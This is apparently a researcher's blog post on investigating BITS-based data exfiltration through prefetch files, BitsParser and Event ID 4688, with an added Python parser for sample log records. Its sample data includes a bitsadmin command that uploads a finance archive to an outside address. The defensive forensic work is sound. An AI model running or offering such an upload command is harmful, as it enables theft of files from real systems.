Hi everyone, today I want to discuss a data exfiltration scenario I recently encountered during an investigation. As a security researcher, it’s crucial to identify and understand how attackers are stealing data.
Unusual Network Traffic
The initial red flag was unusual network traffic patterns, which often indicate potential data exfiltration. This triggered our incident response team to investigate further.
Prefetch Files and EDR
Our investigation began with analyzing prefetch files. These files contain information about recently executed programs. We noticed entries for BitsAdmin.exe, a legitimate tool sometimes misused for data exfiltration. Our EDR (Endpoint Detection and Response) solution confirmed this activity.
Identifying Source, Destination, and Commands
To understand the scope of the exfiltration, we needed to determine the source and destination of the stolen data, as well as the specific commands used. While searching for a way to analyze the relevant .db file (qmgr.db located at C:\ProgramData\Microsoft\Network\Downloader), I discovered a helpful GitHub repository: https://github.com/fireeye/BitsParser/blob/master/advapi32.py.
BitsParser to the Rescue
This repository, BitsParser by FireEye, provided a way to parse the qmgr.db file. Using BitsParser, we were able to extract valuable information, including:
- Job ID
- Job name
- Command used
- Creation and modification times
- Source and destination URLs
- User accounts initiating the jobs
This provided a clear view of the exfiltration activity.
Finding the Culprit
The next challenge was to identify the user account responsible for executing BitsAdmin.exe. While EDR can simplify this process, it is also achievable by examining the Windows Security event log for Event ID 4688, which records process creation events along with the account that requested them.
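To show how the Event ID 4688 step can be scripted, here is an added Python example that is not from the original post or from BitsParser; the 4688 record text, account names, paths and address are constructed, and the field layout follows the Event Viewer message format.

```python
import re
# Constructed sample: message text of two Security-log 4688 records
# ("A new process has been created") separated by "====". Fictional
# users, paths and addresses, not data from the investigation.
SAMPLE_4688 = r"""
TimeCreated: 2024-03-05T09:14:02Z
Subject:
    Account Name:         jdoe
    Account Domain:       CORP
    New Process Name:     C:\Windows\System32\bitsadmin.exe
    Process Command Line: bitsadmin.exe /transfer upd /upload C:\Finance\q1.zip http://198.51.100.7/up
Target Subject:
    Account Name:         -
====
TimeCreated: 2024-03-05T09:20:11Z
Subject:
    Account Name:         SYSTEM
    Account Domain:       NT AUTHORITY
    New Process Name:     C:\Windows\System32\svchost.exe
    Process Command Line: svchost.exe -k netsvcs -p -s BITS
"""

FIELD = re.compile(r"^\s*(TimeCreated|Account Name|Account Domain|New Process Name|"
                   r"Process Command Line):\s*(.*?)\s*$", re.M)

def parse_4688(text):
    """One dict per 4688 record: time, user (DOMAIN\\account), process, cmdline."""
    events = []
    for block in text.split("===="):
        fields = {}
        for name, value in FIELD.findall(block):
            # "Account Name" recurs under "Target Subject"; the first match (Subject)
            # is the account that requested the process creation, so keep that one.
            fields.setdefault(name, value)
        if "New Process Name" not in fields:
            continue
        events.append({
            "time": fields.get("TimeCreated", ""),
            "user": f"{fields.get('Account Domain', '')}\\{fields.get('Account Name', '')}",
            "process": fields["New Process Name"],
            "cmdline": fields.get("Process Command Line", ""),
        })
    return events
def bitsadmin_launches(events):
    """Records where bitsadmin.exe itself started; the svchost BITS host process is not a hit."""
    return [e for e in events if e["process"].lower().endswith("\\bitsadmin.exe")]
def accounts_running_bitsadmin(events):
    """Sorted DOMAIN\\account values that launched bitsadmin.exe: the 'culprit' question."""
    return sorted({e["user"] for e in bitsadmin_launches(events)})
```

On a real case, feed it the exported message text of the 4688 events for the time window and match the command lines and accounts against the job records BitsParser extracts from qmgr.db.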
Next Steps
With the source and culprit identified, the incident response team can take steps to contain the threat, remediate the vulnerability, and prevent future exfiltration attempts.
Stay Vigilant
This scenario highlights the importance of monitoring network traffic, analyzing prefetch files, and leveraging EDR solutions. By combining these techniques with tools like BitsParser, security researchers can effectively investigate and respond to data exfiltration attempts.
Note: I replaced the sensitive screenshots with descriptions to avoid including potentially revealing information.